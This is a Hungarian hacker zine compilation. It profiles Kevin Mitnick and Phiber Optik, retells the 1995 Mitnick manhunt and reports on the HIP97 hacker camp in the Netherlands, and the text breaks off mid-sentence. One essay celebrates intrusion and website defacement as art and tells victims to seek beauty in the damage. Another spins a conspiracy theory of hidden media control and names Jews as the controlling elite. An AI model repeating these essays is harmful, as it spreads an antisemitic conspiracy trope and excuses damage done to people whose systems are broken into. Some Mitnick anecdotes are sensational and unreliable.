Mitnick, Kevin (1963) Legendás hacker, akinek sikerült betörnie az FBI vonalaira, és ezekrol követnie az ellene indított, majd két évig tartó embervadászatot. 1995 februárjában végül elkapták: nyolc héten át üldözte az Internet-en a komputerbiztonság legjobb szakértojének tartott Tsutomu Shimomura. A New York Times riportere, John Markoff követte a cyber-vadászatot. Megírt róla mindent, kivéve azt, hogy o és Shimomura filmszerzodést kötöttek a Mitnick-ügyrol. Markoff már régebben érdeklodött Mitnick bravúrjai iránt, az o akkor még ismeretlen alakjáról rajzolta a hacker figuráját az 1992-ben megjelent Cyberpunk címu könyvben, amelynek társszerzoje volt. Mitnick kövér, szégyenlos, magányos kölyökként nott fel Los Angeles egyik elovárosában. Kamaszkorát a komputer mellett töltötte, sikerült betörnie a manhattani telefonközpont adattárába, sot - megelolegezve az 1983-as War Games címu filmet a hadügyminisztérium hálózatába is. Nemcsak a számítógép elott volt sikeres hacker: "társadalommérnökként" - vagyis az olyan hacker-trükkök esetében, amikor csak személyes érintkezés során, például telefonszereloként fellépve lehet valamilyen kód birtokába jutni - is nagyokat alakított.
Phiber Optik (Mark Abene, 1972) A komputer és a telefontechnológia mestere, a New York-i Masters of Deception (MOD) hacker-banda vezetoje. A csapat legnagyobb húzása 1989-ben volt, amikor feljutottak New York egyik közszolgálati tévécsatornájának komputerhálózatára, és a képernyokön boldog Hálaadást kívántak a pulykáknak (Happy Thanksgiving, you turkeys, from all of us at MOD - a "turkey" szó egyébként idegbajos kis hülyét is jelent; másrészt viszont az amerikaiak, ha csak tehetik, Hálaadás ünnepén pulykasültet esznek - a ford.) Abene saját állítása szerint ebben nem volt benne. 1992 júliusában viszont benne volt egy sorozat, jobbára ártatlan számítógéphálózat-feltörésben, amiért egy évi börtönre ítélték. Tíz hónapot ült, ezalatt annyi újságíró kereste fel, hogy cellatársai elkeresztelték CNN-nek. A börtönben megtagadták tole a számítógépet, így sokak szemében valóságos népi hossé vált. Kiszabadulása után Stacy Horn, az Echo Bulletin Board System vezetoje alkalmazta. Legnagyobb húzásait Michelle Slatalla és Joshua Quittner The Gang That Ruled Cyberspace címu "hacker-szentéletrajza" örökítette meg.
************************************************************************************************
Hackerek
Ötven évvel ezelott, amikor a számítógépek elterjedtek az egyetemeken, hackereknek azokat nevezték, akik a technikai színvonalat fejlesztették. A hackerek
16
Hackers’ Guide
rendszereket építettek, teszteltek, és új módszereket fedeztek fel. Voltak csoportjaik, akik a Technológiai Szociális Szolgálat név alatt voltak ismertek a nyilvánosság elott. Ok javították ezeket a számítógépes rendszereket. Ma, ötven évvel késobb, egész más csoportok hívják magukat "hackerek"-nek. Egy generáció eltunt, és velük együtt a beállítottságuk, a tudásuk, és céljaik. Manapság úgy tunik, hogy a hackerek már nem a számítógépek lehetoségeit kutatják, inkább rombolnak. De ki tudja ezeket az embereket a tettükért megvádolni? Ez egyfajta "hosszú utazás", amely nagy mennyiségű rombolást és főbenjáró bűncselekményt tartalmaz. "De miért van ez így?" - kérdezhetjük. Nos ennek egy egészen egyszerű oka van. Ha egy általános felhasználó úgy döntött, hogy egy pár fokkal feljebb akar kerülni a hierarchián azzal a céllal, hogy többet tudjon meg a számítógépérol, akkor ő a hacker címet fontosnak látja. Ők valahol hallották, hogy a hackerek valószínűleg mindentudó felhasználók, és ezért akarnak ők is azok lenni. Ezenkívül igen "Cool" dolog hackernek lenni (mint ahogy mozikban mutatták a hackereket). Tehát a tudatlan Heinz folytatja az utazását, és próbálkozással kezdi megtanulni a hackerkedést. Valakitől hallotta, hogy egy hackernek 30 programnyelvet és 10 operációs rendszert kell ismernie. "Hmmm, mik az operációs rendszerek? A DOS nem az egyike ezeknek? Legalább lehetséges az, hogy mindenre, amire szükségem van, online megtalálhatom." A tudatlan Heinz fog egy keresőt, és rákeres a "hacker" szóra, mint keresett fogalomra. Eddig ez a kezdő az Internetet csak az iskolai kérdések miatt használta: újságok, enciklopédiák, tudományos (tan)tárgyak. Honnan tudhatja majd, hogy az információk, amit ő olvasni fog, valószínűleg minden szempontban hamisak lesznek? A kérdések rengeteg "földalatti" weblaphoz vezetnek vissza. - "Hackerek!". A tudatlan Heinz azonnal szörföl ezekre az oldalakra, és mindent elolvas, amihez hozzáfér. De a valóságban itt egyáltalán nem talál olvasnivalót, hanem helyette a következőket: - Cracks - DoS Tools - MS Windows-os trojan programok A kezdő ezeket a programokat mind elkezdi használni, azt gondolva, hogy ez minden, ami körül a Hackervilág forog. A valóságban ez nem így van. Ezek a programok elterjesztik a pusztulást, és nem tanítanak NEKED semmit sem. Ha ez az, amit te csinálni akarsz, akkor hát csináld. De légy akár annak a tudatában is, hogy e programok használata soha nem fog téged "továbbvinni". Az igazi hackerek (programozók, biztonsági szakemberek, Internet profik) még mindig hasonló célokat követnek, mint akik 1950-ben. Ezek a hackerek kernel
17
Hackers’ Guide
modulokat, programokat, scannereket írnak, és hibákat találnak azzal a céllal, hogy a technikai rendszereket javítsák. Ezek az igazi hackerek, az emberek, akik minden lehetségest megcsinálnak. Nem azok az emberek a hackerek, akiket a fimekben, mint hackereket láttál. Ha valóban hacker akarsz lenni, akkor ne szórakozz ezeken a win32-es trójai programokon! írta: BinaryZer0 magyarra fordította: Manguszta
************************************************************************************************
A törés művészete
A `hackeles` sokban hasonlit a muveszetekhez, de sokkal komplexebb azoknal, sokban nehezebb es sokban konnyebb. Nehezebb, mert tobbnyire csak egy ut van, amin jarni lehet, es egy megoldas letezik... mivel mindig a tokeletes vegkifejlethez kell elerkezni, nem lehet hibazni mert akkor minden borul... Konnyebb azert, mert sok tampont letezik, lehet tapogatozni, igaz kicsit sotetben, de valahol mindig ott van a megoldas fenye, ott lebeg elottunk csak eszre kell venni, kell, hogy legyen annyi kreativitasunk, hogy megalkossuk. Nem a vegkifejlett a fontos, hanem az oda vezeto ut. A mu maga nem a deface vagy a muvunkkel valo henceges, hanem az, amig eljutunk oda. Magunk valasztunk, hogy ez az ut konnyu - azaz egyszeru - vagy pedig nehez - tehat muveszi. Persze az egyszerusegnek is megvan a maga szepsege, van amikor a legegyszerubb megoldashoz kell a legnagyobb kreativitas es ez visz egy kis komikumot a megoldasba. A deface-t fel lehet fogni ugy is, mint egy kis promociot a muvunknek, hogy tobben csodalhassak meg azt, tehat egyaltalaban nem elitelendo... Az alkotasnak amit krealtunk sok eredmenye lehet, melyet nevezhetunk akar sajtovisszhangnak, vagy lejaratasnak, de csak az igazi `muertok` tudjak elvezni a szepseget a munek. Vannak a muveszek kozott kevesbe kreativak is, - script-kiddie - de mindent lehet jol csinalni. Ha valaki jol banik az ecsettel - amit lehet, hogy mas adott a kezebe akkoris lehet remekmuvet alkotni, mert ugy sem mindig konnyu az ut - egyszeru a mu. Meg kell probalni elvezni a dolgot es nem karogni mas torese felett, inkabb meg kell probalni megkeresni az O muveben is a szepseget, a tokeletesseget. Minden ember mast lat benne, de az az igazan ugyes, aki tud mindent a masik szemszogebol latni es megerteni a gondolkodasat. Akarva akaratlan okozhatunk kart, de a muveszetnek ez a fo szerepe eletunkben, hogy ujat teremtsen megreformalja a megszokott dolgokat, felrugja a trendeket es
18
Hackers’ Guide
lazadjon a betokozodas ellen. Aki esetleg kart szenved egy mutol, annak is a szepseget kell keresnie, nem pedig tamadni. tobo -
[email protected]
************************************************************************************************
Mi az igazság
Hallasz egy hirt a TV-ben, hazank nemsokara eler ilyen, olyan szintet Europaban, nemsokara javul az eletszinvonal. Hallasz egy masikat, amiben egy olyan erdektelen dolgot kozolnek, mint peldaul az aktualis tozsdeinformaciok. Az elsore azt mondod magadban, `Biztos csak egy ujabb atbaszas, a fele sem igaz, soha nem lesz jo az eletszinvonal...etc`, a lenyeg az hogy nem hiszed el, elfelejted. A masik hir tok erdektelen szamodra, viszont megeshet, hogy pont errol fogsz tarsalogni az egyik baratoddal, a lenyeg az, hogy megmarad a fejedben. Az ijen dolgok, amik megmaradnak az ember fejeben altalaban egy szoval definialhatok, melyet meg talan te is ismersz: `emlekek`. Az emlekek szerepe az eletedben nagyobb mint gondolnad, ezen tapasztalatok alapjan dontesz egyes szituaciokban, cselekszel hirtelen vagy megfontoltan. Mivel az emlekek megmaradnak akar tobb tiz evig is befolyassal lehetnek az egesz eletedre, es nem nehez elkepzelni mekkora hatalommal rendelkezik az aki az emlekeket `gyartja`. Eddig a pontig minden rendben is van, de mivan ha olyan dolgokat hallasz, amik alapjan ugy cselekszel a kesobbiekben, ahogy az az `emlekgyarosnak` megfelel? Hat ez bizony mar ciki. Most azt gondolhatod, hogy aaaa, hat teged nem befolyasol senki, te lazado vagy, etc... Ne hidd! 99%, hogy a te szokasaid kozott is tobb olyan van, melyet az emlekeid miatt vettel fel. Nehez elhinni, de sok osztonod, melyek a szuletesed utan alakultak ki is befolyasolhato a tapasztalataid altal, tehat szinte nincs olyan terulet amit nem lehet iranyitani. Az, hogy ezek a dolgok leteznek teny, bizonyitani nem lehet, epp ettol ilyen tokeletes ez a rendszer. Tamadni oket, harcolni ellenuk, lazadni? Ertelmetlen, tobb okbol is, az egyik az, hogy ugy sem nyerhetsz, nem tudsz eleg embert felsorakoztatni, hogyha megis, ok sem `tisztak` nincs olyan ember, akit nem tudnak befolyasolni ha nagyon akarjak, mindenkinek lehet olyan dolgot mutatni amitol alapjaiban valtozik meg a gondolkodasa. Az ijen irasok pedig teljesen ertelmetlenek, mivel par nap vagy het mulva te is, aki olvasta el fogod felejteni, vagy azt hiszed, hogy talaltal valamit ami az egesz ellenkezojet bizonyitja. Ez a resze a dolognak teljesen automatikusan jatszodik le benned, nem tesznek erte. Van meg valami, amiert nem erdemes harcolni a `hatalom` ellen. Megpedig az, hogy aki megdont egy hatalmat, hatalomba kerul, es a hatalom elveszi az emberek eszet, nincs mit tenni, valaki mindig a tobbiek
19
Hackers’ Guide
felett all, es lehet, hogy mas modszerekkel fog cselekedni, de a rendszer mindig ugyanaz marad. Nagy hatalom tobbet tudni masoknal... Hogy, kik ezek? Nem lehet tudni, valoszinusitem, hogy a mindenkori ertelmisegi reteg elitje, akiknek van ahhoz eszuk, hogy mozgassak a szalakat, nem rasszizmus amit mondok, de a zsidok, vagy az o leszarmazottaik azok, akik bizonyitottan intelligensebbek a tobbi embernel, de termeszetesen semmi nem biztos ilyen teren. A lenyeg az, hogy a politika is csak egy alca ezen szervezetek mukodesenek, a partharcok, partok, politikusok csak babuk. Amit jo ha tudsz, minden amit hallasz, latsz a mediakban, a sajtoban, az interneten, kapcsolatban all a `hatalommal`, ami iranyitja az eletet. Meglehet, hogy ez a letszukseglet, enelkul nem tudnak elni, kaosz lenne, de az is lehet, hogy ez mindmind csak a hatalomert van, azert, hogy valaki feljebb alhasson a tobbieknel, tobbet tudva mindenkirol. Kerdes jogos lehet, hogy akkor miert adnak hirt a mediakban kulonbozo lehallgatasokrol, (Aktak) es hasonlo `titkosszolgalati` modszerekrol, miert hallasz hasonlo dolgokat sci-fi filmekbol? Csak gondold el, hogy ami ilyen jellegu informacio eljut hozzad az mind-mind mar `lejart dolog`. Mar reg ota nem hasznaljak, elavult, van sokkal jobb, precizebb, pontosabb es meg eszrevehetetlenebb. A minap lattam egy musort, ahol egy lehallgatot mutattak be, amely `negyedik generacios` volt, a mukodesenek lenyege az, hogy ha a szobaban van egy femtargy akkor az osszes hangot tovabbitani lehet minden mas eszkoz nelkul egy keszulekhez. Nos a poen nem az, hogy ennyire konnyen lehallgathatoak vagyunk, hanem az a teny, hogy jelenleg a hatodik generacios lehallgatokat fejlesztik. Elgondolkodtato... Ha elgondolkodsz logikus. Miert adnak ki a gyarakbol a fejlesztouzemekbol a legujabb technologiakat, a leggyorsabb szamitogepeket, etc., hogyha meg is tarthatjak, es a kovetkezo tehcnologia megjeleneseig hatalommal birhat az aki birtokolja, ismeri az akkori legfejletebbet? Valoszinuleg lassankent adagoljak a fejlodest, elkepzelhetonek tartom, hogy sok szaz globalis problemat meg tudnank mar oldani, ha az uj technologiakat nem tartanak vissza. Megeshet, hogy sokan ezt az iromanyt badarsagnak tartjatok, de elhihetitek van benne igazsag, csak el kene egy kicsit gondolkodni a dolgokon. tobo -
[email protected]
************************************************************************************************
Kevin D. Mitnick, a CyberKalóz
A világ legveszélyesebbnek kikiáltott hackerét, az Amerikában évek óta körözött Kevin D. Mitnicket több mint egy éve egy sértett adatvédelemszakértô fogta el kéthónapos digitális bújócska és fogócska után. A számítógépkalózra az FBI, 20
Hackers’ Guide
Tsutomu Shimomura cyberdetektívre pedig az új típusú hôsökre vadászó amerikai média csapott le egy esôs februári hajnalon. Kevin nem az az anyagias típus. Bár tinédzser kora óta bohócot csinál bármely digitális rendszervédelembôl és az általa eltulajdonított szupertitkos dokumentumok, friss fejlesztésű szoftverek és egyéb nagyértékű információk összértékét több százmillió dollárra becsülik, pénzhiány miatt hivatalból kirendelt ügyvéd védi. Az ôt rendôrkézre juttató hibát 1994 karácsonyán követte el. Tsutomu Shimomura, az USA egyik vezetô adatvédelmi szakértôje, a San Diego Supercomputer Center üdvöskéje éppen szokásos évi síszabadságát töltötte a Sierra Nevadában amikor munkatársai elképesztô hírt adtak a tudtára. 1994 december 25.én az Interneten át valaki behatolt a tengerparti házában működô számítógéprendszerbe, kipakolta a legújabb adatbiztonsági programjait, tréfás hangüzenetet hagyott a merevlemezen és távozott. Az ismeretlen hacker az Interneten alkalmazott Unix operációs rendszer egy olyan biztonsági hiányosságát használta ki amelynek elméleti lehetôségét egy másik híres számítógépbetyár, Robert T. Morris, az Internet Worm hálózati pszeudo-vírus kiagyalója már 1985-ben felvetette. Az cyberzsaru a hálón keresztül azonnal telekürtölte a világot a hírrel, felvette a kapcsolatot az FBI képviselôivel, és ezzel megkezdôdött a két számítógépes zseni sakkjátszmája a cybervilágot jelentô digitális számítógép és telefonhálózatok dzsungelében. A sors iróniája, hogy az elsô nyomot január végén egy Számítógépek, Szabadság és Privátszféra elnevezésű alapítvány Internet postafiókjában találták, ahová az információszabadság még mindig névtelen bajnoka felmásolta a Shimomurától lopott adatvédelmi dokumentációt. Az alapítvány nem értékelte a gesztust, azonnal értesítették a hatóságokat. Nem telt el 24 óra, és Shimomura az e célra készített speciális megfigyelô program segítségével már laptopja képernyôjén követte nyomon az alapítvány Internet-szolgáltatójánál, a kaliforniai Berkeley Whole Earth 'lectronic Link (Well) szerverén történt újabb behatolást. Az elkövetô profizmusa, stílusa és módszerei egyaránt az évek óta illegalitásban tevékenykedô Mitnickre terelték a gyanút. Mitnick élettörténete egy folytatásos digitális ámokfutás. A lapok címoldalaira elôször 1982-ben került, amikor bejutott az Amerikai Légvédelem egyik szuperkomputerébe. Tizenhét évesen egy telefonfülkébôl feltörte a Pacific Bell számítógéprendszerét, több telefonszámlát lenullázott és ellopott mintegy 200.000 dollár értékű adatot. Hat hónapot kapott egy nevelôintézetben, próbaidôvel szabadult, de azonnal törölte az ügy részleteit a rendôrség adatbázisából, megsemmisítette a bíró bankszámláját egy bankban, majd Izraelbe menekült. Amikor a dolog elfelejtôdött, visszatért az államokba, de nemsokára ismét hallatott magáról. Mindig igyekezett megsemmisíteni minden személyére utaló adatot, de 1988-ban (ekkor 25 éves volt) több hiábavaló kisérlet után sikerült rábizonyítani hogy 4 millió dollár értékű kárt okozott az egyik vezetô amerikai számítógépgyár, a Digital Equipment Corporation (DEC) adatbázisaiban biztonsági szoftverek és titkos kódok eltulajdonításával. A tárgyalás során az ügyész rámutatott : "Ez az ember nagyon, nagyon veszélyes, a saját és a társadalom érdekében távol kell tartanunk minden számítógéptôl", a börtönben még telefonközelbe sem engedték. Ügyvéde bizonyította hogy kliense számítógépfüggôségben szenved, így egy éves börtönbüntetés után próbaidôre bocsátották és egy Los Angelesi terápiás intézetben helyezték el. Szabadulása után rögtön
21
Hackers’ Guide
megsértette a próbaidô feltételeit és 1992 óta eltűnt a hatóságok szeme elôl. A cybertérben idôrôl idôre felbukkant azóta is, többek között FBI kódokkal behatolt több állami adatbázisba, és nagy rádiótelefon-gyártó cégektôl, mint például a Motorola, NEC, Nokia pedig rendszeresen elemelte az operációs szoftvereket. Február 9.-én egy másik Internet-szolgáltató, a San Jose székhelyű Netcom illetékesei felfedezték hogy valaki mintegy 20.000 felhasználójuk hitelkártyaszámát vitte el. Ez súlyos könnyelműség volt Mitnick részérôl, mert a Netcom dial-up, vagyis telefonvonalon elérhetô szolgáltatást biztosít, a támadás is telefonon keresztül érte, így kitalálható hogy ez volt a hacker kiindulópontja, az a bázis, ahol a telefonhálózaton keresztül csatlakozott az Internet számítógép-világhálózatra. Shimomura és stábja áthelyezte székhelyét a Netcom-hoz, gyakorlatilag nem volt más dolguk mint ellenôrizni minden egyes bejövô hívást a telefontársaságok adatbázisaiban. Hamarosan rájöttek hogy a hacker egy fiktív rádiótelefonról dolgozik, hívásait két megpiszkált adatbázisú lokális központ egyaránt a másiknak tulajdonította. Shimomura és az FBI a helyszínen munka közben bemérték, és február 16.-án hajnalban elfogták Mitnicket. Az amerikai sajtó egyre növekvô érdeklôdéssel figyelte az ügyet, amely a Masters of Deception fedônevű hacker társaság óta a legfelkapottabb cyber-szenzáció. A New York Times folyamatosan tudósított az ügyrôl, hasábjain Shimomura posztmodern hérosszá magasztosult. A Hyperion kiadó máris 600.000 dollár foglalót adott a Shimomura és John Markoff, a New York Times riportere által írandó könyvre, Hollywood is érdeklôdik, meg nem erôsített hírek szerint maga Spielberg rendezné a filmváltozatot. Az Internetet komolyan megosztotta az ügy, egyesek elmarasztalják Mitnicket a hacker etika megsértése miatt, a legkomolyabb érv az Internet alapvetôen kölcsönös bizalomra, és nem high-tech adatvédelemre épülô struktúrájának megkérdôjelezését rója fel a megszállott crackernek. A jelenség komolyan hátráltathatja az Internet utóbbi idôben egyre inkább tettenérhetô kommercializálódását, ez viszont már inkább dícséret az egyre halványuló nonprofit jelleget támogatók részérôl. A mátrix eredendôen anarchista tulajdonságait kedvelô komputer-underground körökben pedig napról-napra terebélyesedik a Condor fedônevű cyberpunk mítosza. Az a tény, hogy Mitnick nem próbált meggazdagodni akciói révén, és hogy a SUN Microsystems, a nyílt számítógépes rendszerek gyártója és hálózati szoftverek fejlesztôje biztonság-tesztelési szempontból egyenesen hasznosnak tartja az efféle betöréseket, egyaránt megkérdôjelezi a deviáns zsenit börtönbe juttató jogrendszer helytállóságát. Bodoky Tamás írása alapján. Megtalálta és átszerkesztette: WALTER
************************************************************************************************
22
Hackers’ Guide
Mottó: "A hack-elés nem egy technikai dolog, hanem egy életforma!" -az ismeretlen hackerHacker találkozó Hollandiában Nem árt elõre tisztázni, hogy a hacker és a cracker szó között tartalmilag óriási a különbség! A hacker behatol, élvezi a bentlétet, a sikert, otthagyja nyomát (legtöbbször csinál magának egy jó azonosítót "jó lesz ez még késõbb" alapon), majd távozik. Akad olyan is, aki eltávolít minden nyomot, hogy ne tanuljon senki sem a log file-ok tartalmából. A mûveletsor asszociálható máshoz, de rossz az aki rosszra gondol :-) A hacker szó annak idején a kisebb kapacitású gépek képességeit maximálisan kihasználó programozót illette, aki a gép legmélyebb részeibe is belekotort, hogy programjait használhassa. Sokszor versenyeztek is, hogy egy adott feladatot ki tud optimálisan megoldani. A cracker viszont rosszra használja a lehetõséget, és nagy károkat okoz, mint amilyen kár lehet egy a gyökérkönyvtárra kiadott rekurzív törlés parancs, amire volt már példa egyetemi és üzleti szférában egyaránt. Vannak nehezen eldönthetõ esetek is (hacker vagy cracker?), ilyen a megbántott svéd, magukat hacker-eknek valló emberek története, akik a CIA Web lapját alakították át egy kicsit. A CIA mellett hasonló támadásnak esett áldozatául többek között a Légierõ, a Fehér Ház, és az FBI Web szervere is. Természetesen nem kell annyira misztifikálni a dolgot, ha egy Web szerver "elesik", hisz nem ezeken tárolják a bizalmas adatokat az ilyen szervek! Ma a http://www.skeeve.net/cia/ alatt lehet megtalálni az akkori lapok mását. Kárt ugyan nem okoztak, de nem is díjaznák õket, ha horogra kerülnének! Egy kérdés: vajon az egyes államok nem alkalmaznak-e hacker-t és cracker-t egyaránt, bizonyos információk megszerzésére, mint ahogyan tette ezt az U.S.A. a GATT tárgyalások elõtt fontos információkhoz jutva (a brit állítás nem bizonyított), vagy az Öböl-háborúban megbénítva az iraki kommunikációs rendszert? Hacker vagy cracker? *** A HIP (Hacking In Progress - http://www.hip97.nl) helyszíne az "In The Middle Of Nowhere" azaz a "Sehol Közepe" nevet kapta, ami valójában a hollandiai AlmereBuiten közelében felállított ideiglenes kempinget jelenti. A kempingtábor, a körülményekhez képest korrekt tisztálkodási és étkezési lehetõségekkel volt felszerelve. Az árak ebben az országban sem a mi kereseteinkhez szabottak, bár helybeliként az 1200 (holland) forint havi munkanélküli segélybõl is megélnénk, ami közel 120.000 (magyar) forint... Az infrastruktúrához hozzátartozott, hogy telefonálni is lehetett a felállított kártyás telefonokról, a mellette levõ automatából pedig folyamatosan lehetett venni a telefonkártyát. A "Hall"-ban a legnagyobb sikert a Jolt Cola aratta (http://www.joltcola.com), ami félhivatalosan hacker ital a magas koffeintartalma
23
Hackers’ Guide
miatt. Ennek segítségével kitartóbban lehet hajnalig dolgozni, amikor egyes fáradtabb root-ok már nyugovóra térnek... A táborban sátrak tömkelege. A szervezõk adatai alapján a táborban több, mint kétezer ember volt és több száz számítógép. Volt aki hozott saját parabolaantennát vagy micro-t! A leghatásosabb látványt számomra az a fehér teherautó jelentette, aminek szegecselt borítása kissé megviseltnek látszott, és a hátsó része ki volt nyitva, így lehetett látni, hogy a rozoga külsõ mögött több számítógép is üzemel. A melegben félmeztelenre vetkõzött hosszú hajú srácok a MetallicA Kill'em all címû lemezét hallgatták, miközben a hack-elés folyamatban volt... No remorse, no repent We don't care what it meant Another day, another death Another sorrow, another breath Attack... Majd ezt követte a Seek & Destroy és a Metal Milita... Az összkép pezsdítõ! A Metal Rendõrség nem, de a holland FBI 24 órán keresztül képviseltette magát az összejövetelen, így nem mindenki mert a nyilvánosság elõtt mindent bemutatni. Ugyanakkor zárt körökben az emberek igencsak megnyíltak, és szívesen mutatták be tudományukat. A zárnyitók sátrában is nagy volt a forgalom, de elõadást õk sem tartottak... Reklámoztak viszont egy "HACKS" címû filmet. A filmet Christine Bader készítette a hacker-ekrõl és Bielefeld városában fogják bemutatni október 5.-én. Talán akad majd filmforgalmazó, aki Magyarországra is behozza a filmet!? Hack-elni nemcsak számítógépet vagy zárakat lehet, de az elsõ órák után a belépõket is, így tökéletes sajtós belépõket is lehetett szerezni! A nagy számú holland résztvevõk mellett nagyon sok volt a külföldi is. Még Szingapúrból is jöttek emberek, és magyarok is szép számban jelentek meg. A közel 20 fõs magyar csapatban voltak tudósítók, érdeklõdõk, és aktív hacker-ek is. Ez utóbbiaktól megtudhattuk, hogy a napokban lettek megbüntetve oktatási intézményükben, és elmondásuk alapján az eljárás igencsak jogszerûtlen volt. Nem angyalok, de kárt nem okoztak, viszont nem mindenki állt úgy a dologhoz, hogy elfogadja a hacker-kedést. Az érdekessége a dolognak, hogy egy hacker-t többek között azzal büntetnek, hogy az adott gépen megszüntetik az azonosítóját. Egy olyan gépen, amire már betört... Azért szurkolok nekik, hogy mielõbb folytathassák tanulmányaikat, mivel fel is függesztették õket, és ne törjenek le, ha azt hallják, hogy vannak országok, ahol a rendszergazda helyére a betörést elkövetõ hacker-t veszik fel rendszergazdának! A futó programokról és az egyes rések kihasználásáról nem szeretnék részletesen beszámolni, hiszen a megfelelõ levelezési listákon ezekrõl elegendõ információ szerezhetõ be, ami pedig nem publikus, az nem publikus... Azt mindenképpen fontos kiemelni, hogy a rendezvény ideje alatt károkozás nem történt a gépekben! Ha valaki be tudott törni egy gépre, akkor örömmel tudatta az illetõ gép root-jával az eseményt: "you've been hacked!" (meg lettél hack-elve!). Megbeszélték a dolgot, befoltozták a rést, a show pedig ment tovább!
24
Hackers’ Guide
Az elõre meghirdetett mûsor a már említett HIP fõgépen is megtalálható volt. Ebbõl lehetett látni, hogy a PGP kódolástól a Perl, mint hacker nyelv címû elõadáson át az ActiveX hajmeresztõ biztonsági hiányosságáig mi mindenrõl lesz szó vagy bemutató! Mindenképpen szeretném kiemelni a Van Eck demonstrációt, amit az aacheni Erhard Moeller professzor mutatott be. Egy antenna és egy-két céleszköz segítségével egy képernyõn megjelenõ szöveget lehet letapogatni, és egy másik képernyõn megjeleníteni... A mai technikának köszönhetõen már laptop képernyõrõl is nyerhetõ információ, de az ezt megvalósító eszközök csak katonai és állami megrendelésre szerezhetõk be! A fizikából tanult Faraday-kalitka elvet használva a fontos számítógépek monitorait éppen ezért úgynevezett tempest szobákban tárolják, de nem olcsó mulatság ilyen szobákat kialakítani, így a technika sok helyen alkalmazható... Az elõadások listája igen hosszú, így csak még egyet szeretnék megemlíteni, ez pedig az IBM hollandiai smartcard (chip-kártya) részlegének egyik neves szakembere Piet Maclaine Pont által tartott elõadás volt. Szabadságát ezen rendezvény miatt szakította meg, és egy órát beszélt a nagyközönségnek. Egy pár fõs csoport az elõadás végén kérdésekkel bombázta, mire kimentünk az elõadó sátorból, és egy újabb órát beszélgettünk vele. Munkaadója érdekeit maximálisan képviselte, de mégis ez a második egy óra sokkal érdekesebb és bizalmasabb volt az elsõ egy óránál... A biztonsággal kapcsolatban meg kell jegyeznem, hogy a magyar csapat gépei is kint éjszakáztak nylon zacskók takarásában, és senki sem gondolt arra, hogy gépeik reggelre eltûnhetnek, vagy súlyuk egy pár gRAMmal kevesebb lesz. A 24 órán keresztül nyitva tartó "Hall"-ban is el lehetett helyezni a saját gépeket, ha valakinek nem fért a sátrába, vagy nem akarta a szabadban éjszakáztatni gépét. A táborban volt egy kis lebutított "hack me" (hack-elj meg!) gép is, aminek a tetején egy sárga lámpa várta a behatolást (http://hackme.hip97.nl). A sikeres behatolást a lámpa villogása jelezte volna, de jómagam egyszer sem hallottam megszólalni, és a hírekben sem szerepelt, hogy a gépre betörtek volna. Olyan sokan próbálkoztak, hogy elég lassú volt a munka a gépen, és a root is naphosszat figyelte a lebutított 386-os gépén a Linux guruk munkáját! Ekkor jutott eszembe az a Linux-os körökbõl eredt mondás miszerint: "Minden rendszer biztonsága fokozható a teljes használhatatlanságig!" Mára ismert a root jelszava, ami a hope4u2 (hope for you too, vagyis: neked is remény...) jelsorozat volt. A tábor megnyitóján videokonferencia kapcsolatot létesítettek az amerikai társrendezvénnyel (Beyond Hope). Emmanuel Goldstein (a résztvevõk tudatában ez a név a 2600-as számmal társul... ld. alt.2600 lap és hírcsoport) üdvözölte a HIP résztvevõit, és közölte, hogy a HIP gépét feltörték és az index.html-t megváltoztatták. Errõl a hazai sajtóban is lehetett olvasni, de azt a levelezést is kellett volna idézni, amiben a HIP rendszergazdája megírta Goldsteinnek, hogy nem tudja mit törtek fel, mert az index.html a http://www.hip97.nl alatt sértetlen és változatlan, és amennyiben ezt az állományt megváltoztatják, akkor õ felkínálja állását Goldsteinnek! A HIP rendezõirõl tudni kell, hogy a hollandiai xs4all (http://www.xs4all.nl) áll mögöttük. A céget egykori hacker-ek alapították, és õk szervezik meg négyévenként a HIP-et, hogy a "fejlõdést" figyelemmel kísérhessék! A harmadik HIP 2001-ben lenne...
25
Hackers’ Guide
A tábor technikai paramétereirõl érdemes elmondani, hogy a "Sehol Közepén" felállítottak egy antennát, amin keresztül a helyi 100 Mbps-os hálózat kifelé 6 Mbpson tudott kommunikálni. A központi gépeknek helyet adó sátorban SUN SPARCstation 4 feliratokra lehetett bukkanni, a lemezméreteket GB-ban mérték, és a 4 GB-os háttértárakhoz 128 vagy 256 MB RAM dukált, míg az egyik fõgépben 23 GB-os lemez terpeszkedett... Ismerték a mondást miszerint minden rendszer biztonsága olyan erõs, mint amilyen a leggyengébb láncszeme, ezért vigyáztak is minden láncszemre! A tábor áramellátását két darab nagy teljesítményû generátor látta el, melyeknek 5 méteres körzetében tilos volt a rádiótelefonok használata. A rádiótelefonokról egyébként egy egész meggyõzõ bemutatót tartott egy német srác a saját laptopjához kötve azt. A meggyõzõ az volt, hogy nincs teljes biztonság, vagyis minden rendszerbe csak annyi biztonságot iktatnak, amit nehezen lehet megkerülni, vagy nem éri meg a megdöntéséhez szükséges erõforrásokat befektetni. Ez a srác nagy tehetség és idõmilliomos is egyben - fut át az ember agyán a gondolat. Az országok rendszerei különböznek egymástól, de az EU felé tartva a jövõben majd közös szabványok lesznek... Ugyancsak jeleskedett a hitelkártyák és a telefonkártyák tartalmának vizsgálatában, de bemutatóit úgy tartotta, hogy kérésére körbe kellett venni. Hiába volt elõre meghirdetve, hogy melyek a "camera-free" zónák, a fotósok elõszeretettel fotózták az ilyen bemutatókat, aminek nem mindenki örült, hisz tudtuk, hogy sok az érdeklõdõ-figyelõ. Aki sokat jegyzetelt, az gyanússá vált :-) A tuti sérthetetlen speciális mûanyag tokba ágyazott chip-es kártyákról szóló elõadás közben hangzik el a bekiabálás, mely a megfelelõ vegyület neve, ami oldja a mûanyagot sértetlenül hagyva a chip részét. Hiába no, a vegyészethez is értenie kell egy jó hacker-nek és az illetékesek még hálásak is lehetnek, hogy ilyen jó tippeket kapnak rendszerük réseirõl, hiszen jobb ha õk foltozzák be, mielõtt mások kihasználnák azt. Természetes a büntetlenség, és a 24 órás figyelõkkel is el lehet beszélgetni. Vannak dolgok, amiket nem szabad elkövetni. Mik ezek? Mindaz, ami a holland törvényekbe ütközik! Aha... Amikor a területet bérbeadók megtudták, hogy milyen rendezvény lesz a területen, akkor utólag, de még az aláírás elõtt gyorsan tettek még egy pontot a szerzõdésbe: "A rendezõk garantálják, hogy a rendezvény alatt senki sem hatol be más számítógépére". A világ egyetlen olyan sátortábora volt ez, aminél ilyen kikötés szerepel a tábor lakóira...:-) Az emberek önkéntesen építették a tábort. Mindenki, aki hozott magával UTP-s hálózati kártyával ellátott gépet, az hozott elég kábelt is magával, amivel az egész tábor be lett hálózva. A sátrak 